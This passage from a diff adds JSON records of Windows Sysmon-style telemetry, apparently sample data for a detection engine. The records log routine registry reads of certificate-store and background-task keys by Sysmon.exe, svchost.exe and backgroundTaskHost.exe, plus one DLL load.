"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_value": "{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\ActivationType", + "registry_value": "ActivationType", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Conditions", + "registry_value": "Conditions", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Flags", + "registry_value": "Flags", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Name", + "registry_value": "Name", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\TriggerEvent", + "registry_value": "TriggerEvent", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\TaskEntryPoint", + "registry_value": "TaskEntryPoint", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PackageRelativeAppName", + "registry_value": "PackageRelativeAppName", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PsmActivationType", + "registry_value": "PsmActivationType", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PackageFlags", + "registry_value": "PackageFlags", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\ExtendedRegistrationData", + "registry_value": "ExtendedRegistrationData", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\EventType", + "registry_value": "EventType", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\EventType", + "registry_value": "EventType", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "threadpoolwinrt.dll", + "image_path": "C:\\Windows\\System32\\threadpoolwinrt.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 